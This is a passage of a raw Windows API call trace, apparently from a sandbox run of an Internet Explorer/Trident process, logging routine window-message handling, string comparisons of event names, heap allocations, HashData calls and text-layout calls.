plResult=0x199a74 | out: plResult=0x199a74) returned 0x0 [0171.971] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0171.971] GetMessageTime () returned 30885828 [0171.971] GetMessagePos () returned 0x11e01d6 [0171.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.971] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.971] memcpy_s (in: _Destination=0xd97320, _DestinationSize=0x118, _Source=0xd97200, _SourceSize=0x118 | out: _Destination=0xd97320) returned 0x0 [0171.971] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd00 [0171.972] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.972] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0171.972] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0171.973] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd00 | out: hHeap=0x5e0000) returned 1 [0171.973] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.973] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.973] memcpy_s (in: _Destination=0xd97440, _DestinationSize=0x118, _Source=0xd97200, _SourceSize=0x118 | out: _Destination=0xd97440) returned 0x0 [0171.973] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcc60 [0171.984] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0171.984] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0171.985] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0171.985] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.985] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcc60 | out: hHeap=0x5e0000) returned 1 [0171.985] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x199334 | out: plResult=0x199334) returned 0x0 [0171.986] GetCurrentThreadId () returned 0xb48 [0171.986] GetCurrentThreadId () returned 0xb48 [0171.986] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0171.986] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0171.986] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199e44 | out: phIMC=0x199e44*=0x0) returned 0x0 [0171.987] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0171.987] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0171.987] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.987] GetCurrentThreadId () returned 0xb48 [0171.987] GetCurrentThreadId () returned 0xb48 [0171.988] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.988] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.988] GetCurrentThreadId () returned 0xb48 [0171.988] GetCurrentThreadId () returned 0xb48 [0171.988] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.988] GetCurrentThreadId () returned 0xb48 [0171.988] GetCurrentThreadId () returned 0xb48 [0171.989] GetCurrentThreadId () returned 0xb48 [0171.989] GetMessageTime () returned 30885828 [0171.989] GetMessagePos () returned 0x11e01d6 [0171.989] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x199da4 | out: plResult=0x199da4) returned 0x1 [0171.989] NtdllDefWindowProc_W () returned 0x0 [0171.989] GetCurrentThreadId () returned 0xb48 [0171.990] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0171.990] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0171.995] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0171.996] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.996] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0171.996] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.996] GetCurrentThreadId () returned 0xb48 [0171.997] GetCurrentThreadId () returned 0xb48 [0171.997] IsWinEventHookInstalled (event=0x8005) returned 0 [0171.997] GetCurrentThreadId () returned 0xb48 [0171.997] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0171.997] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.997] GetCurrentThreadId () returned 0xb48 [0171.998] GetCurrentThreadId () returned 0xb48 [0171.998] GetFocus () returned 0x103e2 [0171.998] GetCurrentThreadId () returned 0xb48 [0171.998] IsWinEventHookInstalled (event=0x8005) returned 0 [0171.998] GetCurrentThreadId () returned 0xb48 [0171.998] GetCurrentThreadId () returned 0xb48 [0171.998] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0171.998] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.999] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0171.999] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0171.999] GetCurrentThreadId () returned 0xb48 [0171.999] GetCurrentThreadId () returned 0xb48 [0171.999] IsWinEventHookInstalled (event=0x800a) returned 0 [0171.999] GetCurrentThreadId () returned 0xb48 [0171.999] LsSetDoc () returned 0x0 [0172.000] LsCreateLine () returned 0x0 [0172.000] LsDestroyLine () returned 0x0 [0172.000] GetFocus () returned 0x103e2 [0172.000] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0172.001] _CIsqrt () returned 0x3ff0027f [0172.001] _CIsqrt () returned 0x3ff0027f [0172.001] _CIatan2 () returned 0x20 [0172.001] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3099082011913) returned 1 [0172.001] GetCurrentThreadId () returned 0xb48 [0172.001] GetCurrentThreadId () returned 0xb48 [0172.001] GetCurrentThreadId () returned 0xb48 [0172.001] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3099082043247) returned 1 [0172.001] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3099082049978) returned 1 [0172.002] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3099082057968) returned 1 [0172.002] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3099082062840) returned 1 [0172.002] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3099082067559) returned 1 [0172.002] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3099082081996) returned 1 [0172.002] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3099082112976) returned 1 [0172.002] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.002] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.002] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.003] SetEvent (hEvent=0x304) returned 1 [0172.003] WTSGetActiveConsoleSessionId () returned 0x1 [0172.003] GetCurrentProcessId () returned 0xe14 [0172.003] GetCurrentThreadId () returned 0xb48 [0172.003] SetEvent (hEvent=0x668) returned 1 [0172.003] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0172.004] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0172.004] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.004] GetAsyncKeyState (vKey=17) returned 0 [0172.004] GetAsyncKeyState (vKey=16) returned 0 [0172.005] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0172.005] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.005] memcpy_s (in: _Destination=0xd97560, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd97560) returned 0x0 [0172.005] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0172.005] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.005] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.005] memcpy_s (in: _Destination=0xd97680, _DestinationSize=0x118, _Source=0xd97560, _SourceSize=0x118 | out: _Destination=0xd97680) returned 0x0 [0172.005] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0172.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.006] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0172.007] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0172.007] GetMessageTime () returned 30889031 [0172.007] GetMessagePos () returned 0x11e01d6 [0172.007] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x105, wParam=0x1b, lParam=0xe0010001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0172.007] NtdllDefWindowProc_W () returned 0x0 [0172.008] GetCurrentThreadId () returned 0xb48 [0172.008] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.008] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.008] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.008] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0172.008] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0172.008] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099082722686) returned 1 [0172.009] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0172.009] NtdllDefWindowProc_W () returned 0x0 [0172.009] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.009] GetAsyncKeyState (vKey=17) returned 0 [0172.009] GetAsyncKeyState (vKey=16) returned 0 [0172.009] GetAsyncKeyState (vKey=18) returned 0 [0172.009] TranslateMessage (lpMsg=0x19a5a8) returned 1 [0172.010] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.010] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.010] GetCurrentThreadId () returned 0xb48 [0172.010] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.010] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.010] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.010] KillTimer (hWnd=0x30316, uIDEvent=0x201a) returned 1 [0172.011] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099082958267) returned 1 [0172.011] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0172.011] GetFocus () returned 0x103e2 [0172.011] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.011] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfccc4 | out: lpRect=0xcfccc4) returned 1 [0172.011] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.011] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099083024838) returned 1 [0172.011] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0172.011] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x15040a78 [0172.011] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0172.011] GetRandomRgn (hdc=0x4010197, hrgn=0x15040a78, i=4) returned 1 [0172.012] OffsetRgn (hrgn=0x15040a78, x=-507, y=-333) returned 2 [0172.012] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0172.012] GetRegionData (in: hrgn=0x15040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0172.012] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c5e8 [0172.012] GetRegionData (in: hrgn=0x15040a78, nCount=0x30, lpRgnData=0x9f6c5e8 | out: lpRgnData=0x9f6c5e8) returned 0x30 [0172.012] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.012] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c5e8 | out: hHeap=0x5e0000) returned 1 [0172.012] DeleteObject (ho=0x15040a78) returned 1 [0172.012] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c2d8 [0172.012] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c2d8) returned 0x8f040a6c [0172.012] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c2d8 | out: hHeap=0x5e0000) returned 1 [0172.012] SelectClipRgn (hdc=0x4010197, hrgn=0x8f040a6c) returned 2 [0172.012] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c5e8 [0172.012] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c5e8) returned 0x26040a81 [0172.012] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c5e8 | out: hHeap=0x5e0000) returned 1 [0172.012] ValidateRgn (hWnd=0x103e2, hRgn=0x26040a81) returned 1 [0172.013] DeleteObject (ho=0x8f040a6c) returned 1 [0172.013] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.013] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0172.014] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.014] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68be38 [0172.014] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0172.014] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.014] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.014] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.015] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0172.015] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0172.015] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.015] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.015] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.015] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0172.015] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0172.015] HashData (in: pbData=0x9f83160, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.015] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.015] HashData (in: pbData=0x9f83164, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.015] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0172.015] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0172.015] HashData (in: pbData=0x9f82f98, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.015] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.015] HashData (in: pbData=0x9f82f9c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.015] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0172.015] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.016] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0172.016] HashData (in: pbData=0x9f83010, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.016] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.016] HashData (in: pbData=0x9f83014, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.016] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0172.016] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0172.016] HashData (in: pbData=0x9f83028, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.016] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.016] HashData (in: pbData=0x9f8302c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.016] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0172.016] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0172.016] HashData (in: pbData=0x9f830b8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.016] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.016] HashData (in: pbData=0x9f830bc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.016] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0172.016] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0172.016] HashData (in: pbData=0x9f830b8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.017] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.017] HashData (in: pbData=0x9f830bc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.017] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0172.017] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0172.017] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.017] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.017] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.017] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0172.017] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0172.017] HashData (in: pbData=0x9f83100, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.017] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.017] HashData (in: pbData=0x9f83104, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.017] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0172.018] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.018] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0172.018] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.018] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.018] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.018] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0172.018] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f38 [0172.018] HashData (in: pbData=0x9f82f38, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.018] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.018] HashData (in: pbData=0x9f82f3c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.018] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f38 | out: hHeap=0x5e0000) returned 1 [0172.018] LsSetDoc () returned 0x0 [0172.018] LsCreateLine () returned 0x0 [0172.019] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.019] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.057] LsdnFinishRegular () returned 0x0 [0172.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.057] LsdnFinishRegular () returned 0x0 [0172.058] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.058] LsDisplayLine () returned 0x0 [0172.058] IOleInPlaceFrame:SetMenu (This=0xd90ae0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0172.058] IOleInPlaceFrame:SetMenu (This=0xd90ac0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0172.058] GetSysColor (nIndex=8) returned 0x0 [0172.058] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.058] GetSysColor (nIndex=8) returned 0x0 [0172.058] LsDestroyLine () returned 0x0 [0172.058] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0172.058] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0172.059] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f38 [0172.059] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0172.059] HashData (in: pbData=0x9f82f3c, cbData=0x4, pbHash=0x9f82f40, cbHash=0x2 | out: pbHash=0x9f82f40) returned 0x0 [0172.059] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.059] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, 